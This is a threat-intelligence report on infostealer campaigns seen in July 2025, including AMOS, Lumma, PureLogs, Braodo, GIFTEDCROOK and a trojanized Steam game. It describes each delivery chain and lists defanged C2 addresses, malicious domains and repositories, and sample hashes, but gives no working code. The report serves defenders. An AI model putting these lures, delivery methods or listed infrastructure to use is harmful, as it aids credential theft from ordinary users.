Executive Summary

This report offers a comprehensive analysis of emerging infostealer malware campaigns and threat actor activity observed in 2025, with a particular focus on tactics, delivery vectors, and global impact. The cyber threat landscape has evolved rapidly, driven by increasingly sophisticated distribution mechanisms, supply-chain compromises, and the abuse of legitimate tools and infrastructure.

Key campaigns investigated include the Crazy Evil Campaign, which aggressively targets cryptocurrency users with layered malware attacks, and the resurgence of PureLogs and MaksStealer, both of which demonstrate enhanced evasion and payload encryption techniques. A new Go-based strain, “Debian Stealer,” has also emerged, focusing on geolocation tracking and system reconnaissance.

One alarming trend is the abuse of trusted platforms like GitHub, Telegram, and official software distribution sites to deliver malware payloads, as seen in the Braodo, AMOS, and Endgame Gear attacks. The Steam supply-chain compromise of the game Chemia, embedding Vidar and Fickle Stealers, highlights the real-world risks of software distribution hijacking.

Furthermore, Shellter Elite, a legitimate red-teaming tool, has been exploited to covertly distribute info-stealers like Rhadamanthys and SectopRAT, raising concern about post-exploitation frameworks being weaponized by threat actors. In parallel, AMOS has evolved into a full-fledged backdoor, now capable of persistent access and remote execution, marking a significant escalation in macOS-targeted threats.

In geopolitical contexts, the GIFTEDCROOK campaign has specifically targeted Ukrainian institutions using macro-laced PDFs, revealing continued use of phishing and document-based lures in cyberespionage.

Perhaps the most alarming statistic comes from Flashpoint, which revealed an 800% rise in credential theft linked to infostealers amounting to over 1.8 billion compromised records this year alone. This explosion reflects both the scalability of these tools and their growing popularity in the cybercriminal underground.

Real-World Infostealer Campaigns Observed in July

Crazy Evil Campaign Targets Crypto Users with Sophisticated Malware Scams

A Russian-speaking cybercrime gang known as Crazy Evil has launched a widespread social media scam campaign primarily targeting cryptocurrency users. Active since at least 2021, the group has been linked to malware such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer, affecting both Windows and macOS platforms. Operating through a network of sub-groups and fake crypto platforms like Voxium and TyperDex, Crazy Evil uses phishing sites and malicious redirects to steal identities and digital assets.

Their structure includes multiple affiliate teams that drive targeted traffic to these fraudulent sites using advanced lead generation techniques. Crazy Evil maintains an active presence via Telegram, operating multiple private channels such as “Payments”, “Logbar”, “Info”, and “Global Chat”, which support affiliate coordination, payout tracking, technical guides, and general channel communication. The threat actor behind the operation is known on Telegram as @AbrahamCrazyEvil, and the public channel @CrazyEvilCorp

In July, the group used the rivatalk[.]com domain (as shown in the screenshot) to distribute a malicious downloader application for both Windows 10+ and macOS 10.15+. Victims were instructed to enter a meeting code in order to download what appeared to be a desktop app. This activity aligns with their campaign structure - specifically linked to the GrassCall/VibeCall scams previously documented in earlier months.

PureLogs Stealer Abuses Legitimate Sites to Deliver Encrypted Malware Payloads

In July, a surge of PureLogs Stealer infections was observed leveraging a legitimate Swedish real estate website ( vastkupan[.]com ) to host and distribute malicious payloads disguised as PDF files. These campaigns typically began with droppers, often encrypted by PureCrypter, which retrieved files like Daupinslenj.pdf or Cxqyoub.dat that were not PDFs at all, but rather XOR-obfuscated .NET DLLs. Once downloaded, the DLL was decrypted in-memory and injected into legitimate processes such as InstallUtil.exe or RegAsm.exe , thereby evading detection.

Network analysis revealed that infected systems would connect to command-and-control (C2) servers such as 91[.]92[.]120[.]101:65535 and 65[.]108[.]24[.]103:62050. The malware operators even used directory listing on the compromised server to drop files , which directly led to PureLogs deployment.

MaksStealer Campaign Resurfaces with New Java-Based Samples

In early July, renewed activity was observed involving the MaksStealer malware family, a Java-based infostealer that continues to circulate through obfuscated .jar payloads. Recent samples were seen communicating with malicious domains such as zium[.]xyz and rext[.]xyz, both flagged for involvement in malware delivery and data exfiltration.

Additional MaksStealer files were also seen on MalwareBazaar, reinforcing that the malware is actively spreading across multiple channels. These sightings confirm the stealer’s continued evolution and presence in the threat landscape despite limited mainstream reporting.

The reported samples include multiple obfuscated .jar payloads, such as OutBuilder33.jar, dupl32.jar, and server_crasher_4.jar, among others. Each sample is tied to Java-based stealer behavior targeting sensitive user data such as credentials, browser sessions, and system metadata. The campaign is consistent with previously observed tactics but demonstrates expansion through multiple loaders and downloader components.

New Go-Based “Debian Stealer” Targets System and Geolocation Data

A new infostealer malware written in Golang and referred to as Debian Stealer was observed circulating recently.

The stealer performs a wide range of system reconnaissance tasks, including:

  • Collecting system information (getSystemInfo, getWindowsInfo, getHardwareInfo)
  • Grabbing geolocation and public IP address
  • Scanning for Discord backup codes and common directories/files
  • Capturing screenshots
  • Extracting software and network-related content

Additionally, the malware structures the exfiltrated data for easy visibility, formatting it for display with clear labels (username, IP address, system uptime, etc.), and includes links to Google Maps to pinpoint the victim’s exact location using IP-based geodata.

Although still limited in visibility, this malware highlights continued interest among threat actors in using Golang for infostealers—likely due to its cross-compilation capabilities and lower detection rates compared to traditional malware families.

Braodo Stealer Spotted Using GitHub for Payload Delivery

A new campaign involving the Braodo Stealer was observed in July, leveraging batch scripts and GitHub-hosted files for infection. The initial dropper, a BAT file named “List of quantity of tape.bat” (MD5: b8fdca1d1d13f20718cc786161d53b31 ), served as the entry point in the infection chain. Upon execution, this script connects to a GitHub repository hosted at https://github[.]com/LABUBU99999/Localoco8386

From there, it downloads an additional BAT file and a ZIP archive containing components of the stealer. Using GitHub as the distribution platform helps the attackers bypass traditional detection mechanisms by exploiting trust in legitimate infrastructure.

This method reflects a growing trend in the infostealer ecosystem, where commodity malware families like Braodo are adopting low-footprint, script-based loaders and open-source hosting platforms to improve evasion and scalability. Braodo itself is known for harvesting browser credentials, session data, and system information, making it a persistent threat in the info-stealing space.

BOFAMET: Python-Based InfoStealer Leveraging Custom C2 Servers

A newly identified Python-based infostealer named BOFAMET has been observed in the wild, featuring a modular design for data collection and exfiltration. Written in Python, BOFAMET includes a dedicated data-harvesting module along with a built-in capability to communicate with attacker-controlled command-and-control (C2) servers.

The stealer is designed to extract sensitive system and user data potentially including credentials, session tokens, system metadata, and application-specific information and transmit it to the following C2 endpoints:

  • 83[.]217.209.205[:8000
  • 185[.]244.50.145[:8080

The use of Python allows BOFAMET to remain lightweight and flexible, while the C2 infrastructure points to active remote management and data collection. Though not yet widely documented, its emergence signals continued diversification in the infostealer ecosystem, with Python-based threats becoming increasingly common due to ease of development and portability.

FormBook Stealer Distributed via Malicious Email Attachment in Italian-Language Campaign

A phishing campaign targeting Italian-speaking users was observed in early July, delivering the FormBook infostealer via a malicious .pif file attachment. The email, appearing to originate from Katharina George ([email protected]), is titled "Ordinazione d'acquisto" (Purchase Order) and contains a short message referencing an attached order document.

The attached file, “Ordinazione d'acquisto.pif” is a disguised executable designed to install FormBook, a well-known infostealer that exfiltrates credentials, session data, keystrokes, and clipboard contents.

The message body is written in formal Italian, likely to improve credibility and evade suspicion:

"Le allego una copia dell'ordine d'acquisto. Resto in attesa di una sua risposta."

("Attached is a copy of the purchase order. I await your reply.")

Image source : https://cert-agid.gov.it/

A sophisticated FormBook malware campaign was uncovered targeting Italian companies, particularly those involved in tenders, energy projects, and strategic commercial initiatives. Despite Microsoft’s security controls such as blocking macros by default using “Mark of the Web” , attackers continue to exploit malicious Office macros by relying on outdated systems and user oversight.

This campaign, analyzed by CERT-AGID, uses a multi-stage approach:

  1. Initial email impersonates a known energy company, claiming to share project-related documents.
  2. A PDF attachment features the company’s logo and contains two links leading to password-protected ZIP files hosted on file-sharing platforms
  3. The extracted ZIP includes Office documents (DOC, XLSB) some benign, others laced with macro-enabled scripts.
  4. When executed, these macros fetch and install FormBook, an infostealer capable of:
    • Logging keystrokes
    • Taking screenshots
    • Harvesting browser credentials
    • Extracting data from web forms
    • Downloading secondary payloads

The infrastructure behind the attack leverages recently registered lookalike domains, and compromised Italian domains belonging to legitimate companies in similar sectors.This campaign highlights the continued use of social engineering and language localization in delivering commodity malware through phishing, with FormBook still actively maintained and frequently observed in global spam waves.

New AMOS Stealer Distribution Domains Mimic Homebrew Project

A newly identified set of distribution domains for the AMOS (Atomic macOS Stealer) was spotted in July, continuing the trend of abusing popular developer tools and branding. This wave leverages the theme of “Homebrew”, a well-known macOS package manager, to lure users into downloading the stealer.

The domains identified include:

  • brrewsh[.]org
  • raw.brrewsh[.]org

These domains mimic the structure and naming convention of legitimate Homebrew infrastructure, likely in an attempt to trick users—especially developers and tech-savvy individuals—into executing malicious payloads disguised as setup or update scripts.

AMOS targets macOS systems, stealing browser-stored credentials, crypto wallets, keychain data, and system information. This new vector demonstrates the increasing sophistication of social engineering tactics in AMOS campaigns and the consistent use of typosquatting to improve distribution success.

PureLogs Stealer Delivered via Invoice-Themed Excel Attachment

 In mid-July, a phishing campaign impersonating **Leister Technologies Italia S.r.l.** was observed delivering the **PureLogs** infostealer through a malicious Excel file attachment. The email, written in Italian, claims to share an invoice titled *“Fattura I500-1413-2025”* and is sent from `[email protected]`, a spoofed or compromised domain.

The attached file:

  • Filename: Leister Technologies Italia S.r.l. - Fattura I500-1413-2025.xls
  • SHA256: 42c4e855a966f8383f09e52eed215c3b8137025dfda6e8afb3c80410e32d3a67
  • File size: ~314 KB

Upon opening the file, macros or embedded scripts initiate a process that ultimately downloads and executes the PureLogs stealer, a malware family known for stealing browser credentials, crypto wallets, and system data. The campaign’s C2 infrastructure is tied to the server 104.243.32[.]185:22109 This case highlights how invoice-themed lures continue to be a reliable social engineering vector for malware distribution, especially among business users who frequently handle financial documents.

Lumma Stealer Evolves: New Tactics and Infrastructure Uncovered

Image source : www.trendmicro.com

After a major law enforcement takedown in May 2025 that disrupted its infrastructure and seized thousands of domains, Lumma Stealer has made a rapid and quiet comeback. According to Trend Micro, Lumma’s operators resumed operations by mid-July, using stealthier delivery tactics, new infrastructure, and a shift away from public underground forums.

The malware, known for stealing sensitive data such as credentials, system info, and browser-stored passwords, is once again being deployed across the globe — this time, with better evasion techniques and more secure command-and-control (C2) channels.

Lumma Stealer’s resurgence is fueled by evolving distribution strategies designed to evade detection and exploit user trust:

  • Pirated Software Lures

    Victims searching for cracked tools are led through malvertising and manipulated search results to download Lumma via password-protected ZIP files, after being filtered through a Traffic Detection System (TDS).

  • CAPTCHA-Based Command Injection

    Fake CAPTCHA prompts on compromised sites trick users into running PowerShell commands that decrypt and execute Lumma entirely in memory, evading traditional defenses.

  • Malware-Loaded GitHub Repositories

    Threat actors create fake GitHub accounts with auto-generated README files, offering fake cheats or tools while embedding Lumma malware in executables like TempSpoofer.exe.

  • Social Media Lure Campaigns

    Platforms like YouTube and Facebook are exploited to share fake tutorials or cracked software links, redirecting users to legitimate-looking sites hosting Lumma payloads.

Steam Supply‑Chain Attack: Vidar & Fickle Stealer Embedded in Chemia Game by EncryptHub

Image source : www.bleepingcomputer.com

In a startling discovery, cybersecurity firm Prodaft revealed that the Steam Early Access title "Chemia" was secretly bundled with three strains of malware — Fickle Stealer, Vidar Stealer, and HijackLoader. These malicious payloads were designed to steal sensitive data including cryptocurrency wallets, browser credentials, and more. Notably, HijackLoader acts as a launcher to deploy additional malware later.

Published by a shadowy entity known as Aether Forge Studios, the game was available via Steam's playtest request system, adding a false sense of trust. Prodaft attributes this campaign to the EncryptHub group, which has conducted targeted phishing and malware attacks since mid-2024.

Malware Execution Chain in "Chemia" Game Installer

During the supply chain attack involving the Chemia game, a well-structured multi-stage malware delivery chain was observed:

  • Stage 1: HijackLoader (CVKRUTNP.exe) was embedded inside the game bundle to establish persistence.
  • Stage 2: HijackLoader connects to a Telegram-based C2 server to fetch additional payloads.
  • Stage 3 (~3 hours later): A malicious DLL (cclib.dll) containing Fickle Stealer is added to the system.
  • Stage 4: A PowerShell script (worker.ps1) is executed to download the main payload from soft-gets[.]com

Endgame Gear Config Tool Trojanized with XRed Malware

A Reddit user reported that the OP1w 4K V2 Configuration Too from Endgame Gear’s official website was infected with the XRed malware, indicating a serious supply-chain compromise.

The user downloaded the installer directly from the vendor’s legitimate download page and observed suspicious behavior upon execution. After submitting the file to a sandbox for analysis, the user confirmed that the tool was trojanized with XRed malware — a remote access trojan (RAT) known for its data exfiltration and propagation capabilities.

The original Reddit poster who uncovered the malware went on to share helpful steps for others to check if they might also be affected. According to them, the trojanized file placed a suspicious executable named Synaptics.exe inside the hidden folder path C:\\ProgramData\\Synaptics\\.

If this Synaptics.exe file is present in that location, it's a strong sign of infection. The poster further explained that the malware sets itself to run automatically on startup and disguises itself under the guise of a legitimate driver. When checking the file properties, the description misleadingly shows up as “Synaptics Pointing Device Driver,” making it harder to detect at a glance.

Shellter Elite Abuse Enables Infostealer Distribution

The widely used red-teaming tool Shellter Elite was illicitly leaked and weaponized by cybercriminals starting in late April 2025. Researchers at Elastic Security Labs uncovered several malware campaigns deploying infostealers such as Lumma Stealer, Rhadamanthys, and SectopRAT using Shellter v11.0 to evade antivirus and EDR detection.

Although Shellter is designed for ethical security assessments and penetration testing, threat actors leveraged its advanced runtime and static evasion features normally used in authorized environments to conceal malware within legitimate binaries.

These campaigns took advantage of Shellter’s ability to inject polymorphic shellcode into clean executables, making the malware nearly invisible to traditional security tools. By encrypting payloads with AES, preloading key DLLs, and bypassing system-level protections like AMSI and API hooking, the attackers ensured their malicious code remained undetected.

The malware was spread through phishing emails, cracked software downloads, and even YouTube videos offering fake tools and game mods. Victims would unknowingly execute a Shellter-wrapped loader that silently unpacked infostealers into memory — without writing anything suspicious to disk.

ARECHCLIENT2 (SectopRAT) Delivered via Shellter-Backdoored Sponsorship Lures

Image source : www.elastic.co

Around May 2025, a wave of phishing campaigns began targeting YouTube content creators. These attacks came disguised as sponsorship proposals from well-known brands like Udemy, Duolingo, and Skillshare. The goal was to trick creators into downloading malicious .rar archives posing as promotional kits.

Inside these archives was a backdoored executable wrapped using the Shellter Elite framework — a red-teaming tool repurposed by attackers to avoid detection. Thanks to Shellter’s obfuscation techniques, including polymorphic code and digital signature misuse, the malware remained largely invisible to antivirus tools.

Once launched, the hidden payload deployed ARECHCLIENT2, also known as SectopRAT — a Remote Access Trojan capable of both spying and data theft. It established contact with a remote command server, giving attackers full access to compromised machines and sensitive user information.

Rhadamanthys Delivered Through YouTube Comments and File-Sharing Platforms

Image source : www.elastic.co

Another Shellter-powered campaign used Rhadamanthys Stealer, targeting users interested in gaming cheats and mods. Malicious YouTube videos often themed around game hacks included download links in the comment section leading to files hosted on platforms like MediaFire.

These files, shared by multiple users and submitted over 100 times, contained payloads similar in structure to previous Shellter-based malware. Upon execution, Rhadamanthys activated and began stealing credentials, browser data, and system information , all while evading static detection.

Atomic macOS Stealer (AMOS): Now a Full-Fledged Backdoor Threat

The Atomic macOS Stealer (AMOS) already one of the most active threats targeting Apple users has taken a serious leap in capability. According to Moonlock , a new variant of AMOS now includes a stealthy, persistent backdoor that gives attackers extended, long-term access to infected systems.

Previously used to steal passwords, browser data, and crypto wallets, AMOS now enables remote command execution, surveillance, and re-infection even after a system reboot.

This persistence is achieved by installing a LaunchDaemon, granting the malware long-term control. It uses AppleScript to execute commands, gain elevated privileges using the stolen user password, and silently set up a communication line with attacker-controlled servers.

The backdoor assigns a unique ID to each victim, enabling targeted remote commands. It also checks whether the device is running in a virtual machine or sandbox helping the malware avoid detection. Once active, the malware contacts its command-and-control (C2) server every 60 seconds to receive instructions like:

  • Run shell commands
  • Remain idle
  • Delete all traces and exit

Image source : https://moonlock.com/

The updated AMOS stealer spreads in a couple of sneaky ways. Sometimes it’s hidden inside fake or cracked software, and other times it’s delivered through spear-phishing emails especially those that pretend to offer job interviews to artists or freelancers.

GIFTEDCROOK Campaign Infiltrates Ukrainian Institutions via Macro-Laced PDFs

A new espionage-focused campaign, known as GIFTEDCROOK, has emerged as a significant threat to Ukrainian military and government audiences. The malware, attributed to the group UAC‑0226, began as a simple browser credential stealer but rapidly evolved into a more powerful intelligence collector by mid‑2025.

Image source : https://arcticwolf.com/

The campaign relies on spear-phishing emails carrying PDF documents styled around military service or administrative updates. When opened, these PDFs prompt victims to visit a file-sharing site Mega.nz and download an Excel workbook that required enabling macros .Once macros were enabled, things moved fast:

  • The Excel file quietly extracted malicious code into hidden folders on the system, like Infomaster or PhoneInfo.
  • It then collected browser data, documents, and VPN configs, focusing on files modified within the last 15 to 45 days .
  • This data was packaged into a zip file, encrypted using XOR, and sent directly to the attackers through Telegram bots, using Telegram’s own APIs.
  • After stealing the data, the malware ran a cleanup script to erase its own tracks, making detection harder.

Massive Surge in Credential Theft: 1.8 Billion Records Stolen in 2025 So Far

Image source : Flashpoint

In a staggering revelation, Flashpoint’s Global Threat Intelligence Index – Midyear 2025 has reported an 800% increase in credential theft incidents compared to previous years. In just the first half of 2025, attackers successfully exfiltrated an estimated 1.8 billion credentials from 5.8 million compromised systems, marking a historic high in the infostealer malware landscape.

This explosive growth is largely attributed to the widespread availability and affordability of infostealer malware on underground forums. Malware like RedLine, Lumma, StealC, and Acreed are commonly sold for as little as $60, making them an accessible tool for both low-level cybercriminals and more organized threat groups. These infostealers quietly siphon off login credentials, session tokens, and sensitive files from victims' devices often with minimal detection.

Once credentials are harvested, they are typically packaged and sold or reused in further attacks. These credentials often become entry points for broader intrusions, leading to ransomware deployment, business email compromise (BEC), or lateral movement within corporate networks. Flashpoint analysts noted that credential-based intrusions were responsible for 78% of all reported data breaches in the first half of the year.

Exploit and Delivery Vectors Deep Dive

Each infostealer in these campaigns arrived through specific delivery techniques and exploit vectors:

Crazy Evil Campaign

  • Vector: Social engineering via fake job offers on LinkedIn and Twitter.
  • Method: Victims are lured with Web3 job postings. Clicking the link downloads a ZIP containing malicious shell scripts posing as offer letters or company materials.
  • Payload: Installs malware like AMOS, StealC, or Angel Drainer silently.
  • Key Trick: Uses credible-looking roles and trusted platforms to lower suspicion and bypass antivirus.

PureLogs Stealer

  • Vector: Both email phishing and abused legitimate websites.
  • Method 1: Macro-laced Excel invoices sent via email fetch stealer once macros are enabled.
  • Method 2: Loader DLLs disguised as PDFs hosted on hacked websites (e.g., a Swedish realty site).
  • Payload: Stealer launched through decrypted loaders.
  • Key Trick: Uses invoice themes and trusted URLs to improve success rate.

Java based MaksStealer

  • Vector: Community-driven platforms like Discord, forums, and YouTube.
  • Method: Promoted as a Minecraft cheat mod called “MaxCoffe.” Users are tricked into downloading a .jar file.
  • Payload: Java-based infostealer.
  • Key Trick: Leverages trust in gaming tools and mod culture for easy spread.

Go based Debian Stealer

  • Vector: Limited, likely manual or private distribution.
  • Method: Possibly spread through rogue update tools, spoofed hacking forums, or phishing messages.
  • Payload: Steals system and geolocation data.
  • Key Trick: Relies on targeted delivery and user curiosity to infect.

Braodo Stealer

  • Vector: Spam emails with .bat file attachments.
  • Method: Malicious batch file downloads more malware from GitHub using PowerShell or BITSAdmin.
  • Payload: Python modules and Braodo ZIP archive.
  • Key Trick: Uses GitHub as a delivery host to blend in with normal web traffic.

Python based BOFAMET

  • Vector: Malspam, fake installers, malvertising, or Trojanized keygens.
  • Method: Sold via underground forums, BOFAMET is shared like plug-and-play malware.
  • Payload: Python-based infostealer with C2 control.
  • Key Trick: MaaS model ensures widespread use by low-skill attackers via common vectors.

FormBook (Italian Campaign)

  • Vector: Spear-phishing emails spoofing Italian companies.
  • Method: Email contains .pif file, leading to a ZIP with macro-enabled Office docs.
  • Payload: FormBook malware downloaded after macros are enabled.
  • Key Trick: Splits attack across file formats to evade security filters.

AMOS (Atomic macOS Stealer)

  • Vector: Fake Homebrew sites, Google Ads, and phishing via dev tools or crypto apps.
  • Method: Malicious shell scripts disguised as terminal install commands.
  • Payload: Stealer + backdoor that survives reboot and accepts remote commands.
  • Key Trick: Poses as trusted macOS utilities and developer tools to gain access.

Lumma Stealer

  • Vector: Fake cracked software pages and sponsored ads.
  • Method: Redirects through Russian infrastructure (e.g., Selectel) using traffic filtering and password-protected downloads.
  • Payload: Encrypted Lumma loaders.
  • Key Trick: Avoids domain takedowns and leverages cracked software culture.

Steam Supply‑Chain Attack (Chemia Game)

  • Vector: Supply-chain attack via Steam game installer.
  • Method: Chemia installer hosted HijackLoader, which then downloaded Fickle Stealer.
  • Payload: Credential stealer DLL (cclib.dll) from external source.
  • Key Trick: Abused game trust and Steam platform to blend in.

Endgame Gear Config Tool Trojan

  • Vector: Supply chain compromise on official vendor site.
  • Method: XRed RAT inserted into legitimate download for OP1w 4K V2 tool.
  • Payload: Remote access trojan enabling persistence and data theft.
  • Key Trick: Hosted on the company’s own CDN, adding credibility.

Shellter Elite Abuse Campaign

  • Vector: RAR attachments in phishing emails.
  • Method: Weaponized Shellter Elite tool used to wrap RATs like Rhadamanthys or SectopRAT.
  • Payload: Polymorphic binaries that bypass antivirus.
  • Key Trick: Disguised as marketing partnerships or sponsorship deals targeting influencers and gamers.

GIFTEDCROOK (Ukraine-focused)

  • Vector: Spear-phishing via military-themed PDFs.
  • Method: PDF drops Excel file with macros that fetch the loader.
  • Payload: Stealer that collects browser data, VPN configs, and document metadata.
  • Key Trick: Encrypts stolen data with XOR and sends via Telegram bots.

Threat Actor Attribution

Several threat actor groups were identified or suspected in these campaigns. The table below summarizes known actors, their regions, typical motives, preferred targets, and associated malware:

Threat Actor / Group Region Motives Targets Associated Malware
Crazy Evil Russia/Eastern Europe Financial (cryptocurrency theft) Crypto users (macOS & Windows) AMOS, StealC, Angel Drainer
Italian FormBook Campaign Italy Credential theft, corporate espionage Italian businesses (energy, procurement) FormBook
PureLogs Stealer Operators Global Data resale, credential theft General users via phishing/malvertising PureLogs Stealer
Vietnamese Braodo Group Vietnam Financial fraud via stolen credentials Vietnam, US, EU tech users Braodo Stealer
MaksStealer Distributors Unknown Account theft, crypto theft Minecraft gamers (Hypixel mod community) MaksStealer (Java)
BOFAMET Developer Unknown Mass data theft, malware-as-a-service Global Windows users BOFAMET (Python-based)
Debian Stealer Author Unknown Reconnaissance & credential theft Global Windows users Debian Stealer (Go-based)
AMOS Group Russia-affiliated Long-term access, surveillance, theft macOS users (devs, crypto holders) Atomic macOS Stealer (AMOS)
EncryptHub (Steam Supply Chain) Unknown Credential theft via game installers Steam gamers (Chemia) Vidar, Fickle Stealer, HijackLoader
XRed Campaign Unknown Espionage and user surveillance Endgame Gear users XRed RAT
Shellter Elite Abuse Actors Unknown Malware distribution via red-team tools Influencers, gamers, content creators Rhadamanthys, SectopRAT via Shellter
GIFTEDCROOK Likely Russian Government surveillance Ukrainian public sector (military, civic) GIFTEDCROOK loader + credential stealer
Lumma Stealer Operators Global Financial gain through credential resale Global victims via ads, cracked software Lumma Stealer

Table: Threat actors and groups linked to the July 2025 campaigns.

Infostealer Impact Trends – July 2025

The charts below highlight key trends observed throughout July related to infostealer activity. Over the course of four weeks, we tracked which domains, email providers, social media platforms, and countries were most frequently targeted or compromised by active infostealer campaigns.

Top 10 Most Compromised Domains

Top 10 Most Compromised Email Providers

Top 10 Most Compromised Social Media Platforms

Top 10 Most Infected Countries

Key Observations:

  • google.com consistently ranked as the most compromised domain, with over 35,000 credential hits across the month making it the top target for infostealers.
  • Among email providers, Gmail saw an overwhelming lead, with over 1.5 million accounts compromised, reflecting its global popularity and frequent use in credential stuffing attacks.
  • On the social media front, Facebook and Instagram were the most targeted platforms, pointing to attackers’ interest in hijacking high-traffic user accounts for fraud, scams, or resale.
  • In terms of geography, India experienced the highest number of infections, followed by Brazil, the U.S., and Indonesia. This suggests a strong regional targeting pattern, possibly linked to user volume, language lures, or regional campaign infrastructure.

While activity fluctuated significantly across the month, there were major spikes on the 28th, 29th, and 30th, indicating possible coordinated campaigns or malware outbreaks during those days.

YARA Rules

For detection of known stealers observed in the report:

TTP Matrix (MITRE ATT&CK Mapping)

Malware / Campaign Initial Access Execution Persistence Exfiltration C2 Communication
Crazy Evil Campaign T1566.002 (Spearphishing via Social Media), T1189 (Drive-by Compromise) T1059.006 (JavaScript/Shell), T1059.004 (AppleScript) T1547.001 (Launch Agent) T1041 (Data over C2) T1071.001 (HTTP/S), T1095 (Non-Application Layer Protocol)
Lumma Stealer T1189 (Malvertising), T1566.001 (Phishing) T1059.003 (Batch/Powershell) T1053.005 (Scheduled Task) T1003 (Credential Dumping), T1041 T1071.001
Steam/Chemia Supply Chain (Vidar, Fickle) T1195.002 (Software Supply Chain) T1059.001 (PowerShell) T1547.001 (Registry Run Key) T1041 T1071.001
Endgame Gear (XRed) T1195.002 T1059.003 T1547.001 T1005, T1041 T1071.001
Shellter Elite Campaign (Rhadamanthys, ARECHCLIENT2) T1566.001 (Phishing), T1189 T1059.003 (Backdoored Executables), T1027 (Obfuscated Files) T1053.005 T1005, T1056.001 T1071.001
GIFTEDCROOK (Ukraine) T1566.001 T1059.005 (Office Macros) T1547.001 T1041 (Encoded Exfiltration via Telegram) T1071.001 (Telegram API)

References

https://hackedlist.io/statistics

https://www.infostealers.com/info-stealers-reports/

https://x.com/JAMESWT_WT/status/1946172962316374137

https://x.com/JAMESWT_WT/status/1942498358645645794

https://cert-agid.gov.it/news/formbook-diffuso-via-macro-office-nel-mirino-aziende-coinvolte-in-gare-e-progetti/

https://x.com/suyog41/status/1940651372304912734 https://x.com/ShadowOpCode/status/1940729513119531217

https://x.com/JAMESWT_WT/status/1940759621419127277

https://x.com/JAMESWT_WT/status/1940759080488022229

https://www.netresec.com/?page=Blog&month=2025-07&post=PureLogs-Forensics

https://thehackernews.com/2025/02/crazy-evil-gang-targets-crypto-with.html?utm_source=chatgpt.com

https://x.com/1ZRR4H/status/1940168409381232826

https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html

https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-malware-into-early-access-steam-game/

https://www.tomshardware.com/tech-industry/cyber-security/hacker-plants-three-strains-of-malware-in-a-steam-early-access-game-called-chemia-security-company-found-crypto-jacking-infostealers-and-a-backdoor-to-install-yet-more-malware-in-the-future

http://github.com/prodaft/malware-ioc/blob/master/LARVA-208/SteamCampaign.md

https://www.reddit.com/r/EndGameGear/comments/1m29q06/security_alert_endgame_gears_op1w_4k_v2/

https://www.elastic.co/security-labs/taking-shellter

https://moonlock.com/amos-backdoor-persistent-access

https://flashpoint.io/blog/flashpoint-2025-global-threat-intelligence-index-midyear/

Indicators & Samples

SHA256 Stealer
42c4e855a966f8383f09e52eed215c3b8137025dfda6e8afb3c80410e32d3a67 PureLogs
20fac811c65a511373fa261a0863998f5ce691b02c91a15be6f8e8e8d510d3dc Amos
d5dc3014138be804fa271f8cc005311642dc622e7ff2a663211fcf58fd5c6fbe Formbook
47476f8794856949179cc2fa4c63ef7e27d3de9b0deb2808927d7ca7a8f6b8aa Formbook
e36ae97ebee84334360ee98e040c172cac19c220bc46dd0e23525a2fb82b4d9a Formbook
30e8db279ea13ae22d612f9902cdfeae5cea48392400266fa8500297c7656b90 Formbook
598d912753e11a710294823f8154ceda4bcebc964dc52c18b961022f00101697 Bofamet
de83ace447db05bca067ca4c66fcfe703013bcacd45c6efd3ef9f270dcc81b22 Braodo
b4371c3a54e13a38238adb655392a71e3e4f981656841103aea4c40cd4e39270 Braodo
a30a9b0c831dbe0e46d9d838ee986c364a575dd4cb5a7f4ac9801338cf6b80f0 Braodo
605dd0645918dae802ef1d6e5e22155397e19a8abd5c71eb1bc8b829ad05381e Debian
b7b03c049f436b2337784e52dd4cd08ca6a0e367a96fd6c59a49b4516f815f9d MaksStealer
bbf04584c359dc79015a612be07ccb8da7f9c11cc3cbd1df99c1bfb920eb1f49 MaksStealer
bdaf3102fa4e2d61a6845c09d2e7be01b15ecd88fd8de805b9b55ed8d6235868 MaksStealer
c54e243a7bffa197df7af451974f84db22a0e6f0913f0d03f58e8b1a983bfbbf MaksStealer
cd4d3a0c96567211593862923625ca51d785fe8fc37ebe0b555232c4a6bedd24 MaksStealer
f1be54a2bd58100905ae9d8525675289ea10debf8e446fe814d14b96f05b9318 MaksStealer
44729cfdf3da6f2b974e4853948d49909c7e3f1e25ac9c47331517031778b8d4 PureLogs
d66850b3496bee853a294db28f3e6ed378c2e2340ea01b745d091e78ac41cb26 PureLogs
18afce420c39b188d83f60cd3482e32cc579695e73b7fb5e5d21ca51498c471f PureLogs
c211e844c192fe91ad5b3ec3b4288392d475797126dd0600ef4a4351d840b58f PureLogs
5dbc967d7e4e57b628dfb12188836ba2c24e6a336c6f81ca625ff58ef491a8fc PureLogs
de3c490fdb1080cd15edfab188a4beed3ea13afc60509ecb3b1f47bbb558bef3 PureLogs
64cbf33b3dac010ad9f9f0f1f1cf2d012227f66df74b8e293fc467a39fded2e9 PureLogs
a47778884f0eb94abf2555e773d9bc61b605086dc3dc93809508b8ce778e7a22 Amos
4a802433176d4678103090719cd052db50692b2755945e57717f28e5dc257b3d dll file (CrazyEvil Campaign)
388f910e662f69c7ab6fcf5e938ba813cf92c7794e5c3a6ad29c2d9276921ed3 Lumma
fa8be0ce6f177965a5cd2db80e57c49fb31083bd4ddcb052def24cfbf48d65b5 Lumma
64f6c0c0fd736c4a82f545aadc7a1c49d4cea77b14f4b526ef9da56a606eeb3d Lumma
ed076c27b420bfa66c251488b4121913fa461367a60c5fa32cee3953efcae32b Fickle stealer
6fb7fd9763d6b269793c80bbc03a1be358390781af4b698fba1591cb8dbb8825 Fickle stealer
2cd8c0e75cf76381f06dfe465a542e52eefa713b0bea2557763e0c0c45b21481 Vidar stealer
9a733b2de84e2bf466287abd034b04b18c8c269535606e8f6403eee2a3b288c4 HijackLoader
12935315254175719cbbaad0b213204ddebd4100ffc551d54f8cf39ced1be227 HijackLoader
7eb0582843dda8500cae54d240eddb728fd146584735ebe65605efecc5e1b376 Xred Malware
c865f24e4b9b0855b8b559fc3769239b0aa6e8d680406616a13d9a36fbbc2d30 Rhadamanthys
b3e93bfef12678294d9944e61d90ca4aa03b7e3dae5e909c3b2166f122a14dad ARECHCLIENT2
8d8b40e87d3011de5b33103df2ed4ec81458b2a2f8807fbb7ffdbc351c7c7b5e Atomic Stealer
3402883ff6efadf0cc8b7434a0530fb769de5549b0e9510dfdd23bc0689670d6 Atomic Stealer
f4976d9a90d2f9868fcaade1449ffcf9982ed2285ace90aafa7099ce246fd2ec Atomic Stealer
